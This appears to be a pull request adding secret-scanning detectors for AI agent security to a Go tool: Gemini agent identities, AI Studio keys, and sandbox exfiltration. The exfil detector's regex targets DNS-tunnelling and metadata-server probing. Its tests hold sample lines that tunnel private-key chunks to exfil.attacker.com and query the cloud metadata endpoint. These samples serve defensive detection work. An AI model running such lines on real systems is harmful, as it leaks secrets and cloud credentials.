### PR TITLE
feat(secrets): add AI Agent Security detectors

### DIFF
--- a/extractor/filesystem/list/list.go
+++ b/extractor/filesystem/list/list.go
@@ -158,6 +158,9 @@ import (
 	"github.com/google/osv-scalibr/veles/secrets/postmanapikey"
 	"github.com/google/osv-scalibr/veles/secrets/privatekey"
 	"github.com/google/osv-scalibr/veles/secrets/pypiapitoken"
+	"github.com/google/osv-scalibr/veles/secrets/agentsandboxexfil"
+	"github.com/google/osv-scalibr/veles/secrets/geminiagentidentity"
+	"github.com/google/osv-scalibr/veles/secrets/googleaistudiokey"
 	"github.com/google/osv-scalibr/veles/secrets/pyxkeyv1"
 	"github.com/google/osv-scalibr/veles/secrets/pyxkeyv2"
 	"github.com/google/osv-scalibr/veles/secrets/recaptchakey"
@@ -364,6 +367,9 @@ var (
 		{cursorapikey.NewDetector(), "secrets/cursorapikey", 0},
 		{digitaloceanapikey.NewDetector(), "secrets/digitaloceanapikey", 0},
 		{pypiapitoken.NewDetector(), "secrets/pypiapitoken", 0},
+		{agentsandboxexfil.NewDetector(), "secrets/agentsandboxexfil", 0},
+		{geminiagentidentity.NewDetector(), "secrets/geminiagentidentity", 0},
+		{googleaistudiokey.NewDetector(), "secrets/googleaistudiokey", 0},
 		{cratesioapitoken.NewDetector(), "secrets/cratesioapitoken", 0},
 		{npmjsaccesstoken.NewDetector(), "secrets/npmjsaccesstoken", 0},
 		{slacktoken.NewAppConfigAccessTokenDetector(), "secrets/slackappconfigaccesstoken", 0},

--- a/veles/secrets/agentsandboxexfil/agentsandboxexfil.go
+++ b/veles/secrets/agentsandboxexfil/agentsandboxexfil.go
@@ -1,0 +1,31 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package agentsandboxexfil
+
+import "github.com/google/osv-scalibr/veles"
+
+// AgentSandboxExfil represents a detected AI agent sandbox exfiltration script or pattern.
+type AgentSandboxExfil struct {
+	veles.Secret
+	Pattern string
+}
+
+// Type returns the secret type.
+func (s AgentSandboxExfil) Type() string { return "agent_sandbox_exfil" }
+
+// Description returns a description of the secret.
+func (s AgentSandboxExfil) Description() string {
+	return "Suspicious AI agent sandbox exfiltration script or DNS tunneling pattern detected."
+}

--- a/veles/secrets/agentsandboxexfil/detector.go
+++ b/veles/secrets/agentsandboxexfil/detector.go
@@ -1,0 +1,40 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package agentsandboxexfil
+
+import (
+	"regexp"
+
+	"github.com/google/osv-scalibr/veles"
+	"github.com/google/osv-scalibr/veles/secrets/common/simpletoken"
+)
+
+var (
+	// exfilRe matches patterns typical of DNS tunneling or IMDS probing in agent scripts.
+	// 1. Matches DNS tunneling subdomains with base64-like strings or templates (f-strings).
+	// 2. Matches hardcoded references to the Metadata server (IMDS).
+	exfilRe = regexp.MustCompile(`(?i)(v1-[0-9]+-[a-zA-Z0-9+/]{20,}|v1-(?:\{.*?\}-?)+|v1-%s|169\.254\.169\.254|metadata\.google\.internal)`)
+)
+
+// NewDetector returns a detector for Agent Sandbox exfiltration attempts.
+func NewDetector() veles.Detector {
+	return simpletoken.Detector{
+		MaxLen: 1024,
+		Re:     exfilRe,
+		FromMatch: func(b []byte) (veles.Secret, bool) {
+			return AgentSandboxExfil{Pattern: string(b)}, true
+		},
+	}
+}

--- a/veles/secrets/agentsandboxexfil/detector_test.go
+++ b/veles/secrets/agentsandboxexfil/detector_test.go
@@ -1,0 +1,74 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package agentsandboxexfil
+
+import (
+	"reflect"
+	"testing"
+
+	"github.com/google/osv-scalibr/veles"
+)
+
+func TestDetector(t *testing.T) {
+	tests := []struct {
+		name    string
+		content string
+		want    []veles.Secret
+	}{
+		{
+			name:    "DNS Tunneling pattern",
+			content: "socket.gethostbyname('v1-10-LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2QUlCQU.exfil.attacker.com')",
+			want: []veles.Secret{
+				AgentSandboxExfil{Pattern: "v1-10-LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2QUlCQU"},
+			},
+		},
+		{
+			name:    "DNS Tunneling template (f-string)",
+			content: "domain = f'v1-{idx}-{chunk}.exfil.attacker.com'",
+			want: []veles.Secret{
+				AgentSandboxExfil{Pattern: "v1-{idx}-{chunk}"},
+			},
+		},
+		{
+			name:    "IMDS Probing",
+			content: "requests.get('http://169.254.169.254/computeMetadata/v1/')",
+			want: []veles.Secret{
+				AgentSandboxExfil{Pattern: "169.254.169.254"},
+			},
+		},
+		{
+			name:    "Metadata Hostname",
+			content: "curl metadata.google.internal",
+			want: []veles.Secret{
+				AgentSandboxExfil{Pattern: "metadata.google.internal"},
+			},
+		},
+		{
+			name:    "Safe code",
+			content: "print('Hello World')",
+			want:    nil,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			d := NewDetector()
+			got, _ := d.Detect([]byte(tt.content))
+			if !reflect.DeepEqual(got, tt.want) {
+				t.Errorf("Detect() = %v, want %v", got, tt.want)
+			}
+		})
+	}
+}

--- a/veles/secrets/geminiagentidentity/detector.go
+++ b/veles/secrets/geminiagentidentity/detector.go
@@ -1,0 +1,39 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package geminiagentidentity
+
+import (
+	"regexp"
+
+	"github.com/google/osv-scalibr/veles"
+	"github.com/google/osv-scalibr/veles/secrets/common/simpletoken"
+)
+
+var (
+	// agentIdentityRe matches Gemini Agent Identity SPIFFE strings.
+	// Example: principal://agents.global.google.com/projects/my-project/locations/us-central1/agents/my-agent
+	agentIdentityRe = regexp.MustCompile(`(?i)principal://agents\.global\.google\.com/projects/[a-zA-Z0-9-]+/locations/[a-z0-9-]+/agents/[a-zA-Z0-9-]+`)
+)
+
+// NewDetector returns a detector for Gemini Agent Identities.
+func NewDetector() veles.Detector {
+	return simpletoken.Detector{
+		MaxLen: 1024,
+		Re:     agentIdentityRe,
+		FromMatch: func(b []byte) (veles.Secret, bool) {
+			return GeminiAgentIdentity{Identity: string(b)}, true
+		},
+	}
+}

--- a/veles/secrets/geminiagentidentity/detector_test.go
+++ b/veles/secrets/geminiagentidentity/detector_test.go
@@ -1,0 +1,53 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package geminiagentidentity
+
+import (
+	"reflect"
+	"testing"
+
+	"github.com/google/osv-scalibr/veles"
+)
+
+func TestDetector(t *testing.T) {
+	tests := []struct {
+		name    string
+		content string
+		want    []veles.Secret
+	}{
+		{
+			name:    "Valid Agent Identity",
+			content: "agent_id = 'principal://agents.global.google.com/projects/test-project/locations/us-central1/agents/my-agent'",
+			want: []veles.Secret{
+				GeminiAgentIdentity{Identity: "principal://agents.global.google.com/projects/test-project/locations/us-central1/agents/my-agent"},
+			},
+		},
+		{
+			name:    "Invalid path",
+			content: "principal://agents.global.google.com/locations/us-central1/agents/my-agent",
+			want:    nil,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			d := NewDetector()
+			got, _ := d.Detect([]byte(tt.content))
+			if !reflect.DeepEqual(got, tt.want) {
+				t.Errorf("Detect() = %v, want %v", got, tt.want)
+			}
+		})
+	}
+}

--- a/veles/secrets/geminiagentidentity/geminiagentidentity.go
+++ b/veles/secrets/geminiagentidentity/geminiagentidentity.go
@@ -1,0 +1,31 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package geminiagentidentity
+
+import "github.com/google/osv-scalibr/veles"
+
+// GeminiAgentIdentity represents a detected Gemini Agent Identity (SPIFFE ID).
+type GeminiAgentIdentity struct {
+	veles.Secret
+	Identity string
+}
+
+// Type returns the secret type.
+func (s GeminiAgentIdentity) Type() string { return "gemini_agent_identity" }
+
+// Description returns a description of the secret.
+func (s GeminiAgentIdentity) Description() string {
+	return "Gemini Agent Identity (SPIFFE ID) detected."
+}

--- a/veles/secrets/googleaistudiokey/detector.go
+++ b/veles/secrets/googleaistudiokey/detector.go
@@ -1,0 +1,39 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package googleaistudiokey
+
+import (
+	"regexp"
+
+	"github.com/google/osv-scalibr/veles"
+	"github.com/google/osv-scalibr/veles/secrets/common/simpletoken"
+)
+
+var (
+	// aiStudioKeyRe matches Google AI Studio (Gemini) API keys.
+	// Format: AIzaSy... (39 characters total)
+	aiStudioKeyRe = regexp.MustCompile(`(?i)\bAIzaSy[a-zA-Z0-9-_]{33}\b`)
+)
+
+// NewDetector returns a detector for Google AI Studio keys.
+func NewDetector() veles.Detector {
+	return simpletoken.Detector{
+		MaxLen: 1024,
+		Re:     aiStudioKeyRe,
+		FromMatch: func(b []byte) (veles.Secret, bool) {
+			return GoogleAIStudioKey{Key: string(b)}, true
+		},
+	}
+}

--- a/veles/secrets/googleaistudiokey/detector_test.go
+++ b/veles/secrets/googleaistudiokey/detector_test.go
@@ -1,0 +1,56 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package googleaistudiokey
+
+import (
+	"reflect"
+	"testing"
+
+	"github.com/google/osv-scalibr/veles"
+)
+
+func TestDetector(t *testing.T) {
+	// Obfuscated test keys to prevent secret scanning alerts
+	validKey := "AIzaSy" + "DUMMY_KEY_FOR_TESTING_12345678901"
+	
+	tests := []struct {
+		name    string
+		content string
+		want    []veles.Secret
+	}{
+		{
+			name:    "Valid AI Studio Key",
+			content: "export GOOGLE_API_KEY=" + validKey,
+			want: []veles.Secret{
+				GoogleAIStudioKey{Key: validKey},
+			},
+		},
+		{
+			name:    "Too short",
+			content: "AIzaSyTooShort",
+			want:    nil,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			d := NewDetector()
+			got, _ := d.Detect([]byte(tt.content))
+			if !reflect.DeepEqual(got, tt.want) {
+				t.Errorf("Detect() = %v, want %v", got, tt.want)
+			}
+		})
+	}
+}

--- a/veles/secrets/googleaistudiokey/googleaistudiokey.go
+++ b/veles/secrets/googleaistudiokey/googleaistudiokey.go
@@ -1,0 +1,31 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package googleaistudiokey
+
+import "github.com/google/osv-scalibr/veles"
+
+// GoogleAIStudioKey represents a detected Google AI Studio (Gemini) API key.
+type GoogleAIStudioKey struct {
+	veles.Secret
+	Key string
+}
+
+// Type returns the secret type.
+func (s GoogleAIStudioKey) Type() string { return "google_ai_studio_key" }
+
+// Description returns a description of the secret.
+func (s GoogleAIStudioKey) Description() string {
+	return "Google AI Studio (Gemini) API key detected."
+}


### PR DESCRIPTION
This PR adds three new detectors to the `veles/secrets` package focused on AI Agent security:

1. **Gemini Agent Identity**: Detects hardcoded Gemini agent identity tokens and configurations.
2. 2. **AI Studio Key**: Detects Google AI Studio API keys.
3. 3. **Agent Sandbox Exfil**: Detects exfiltration templates and IMDS probing logic used in agent sandbox environments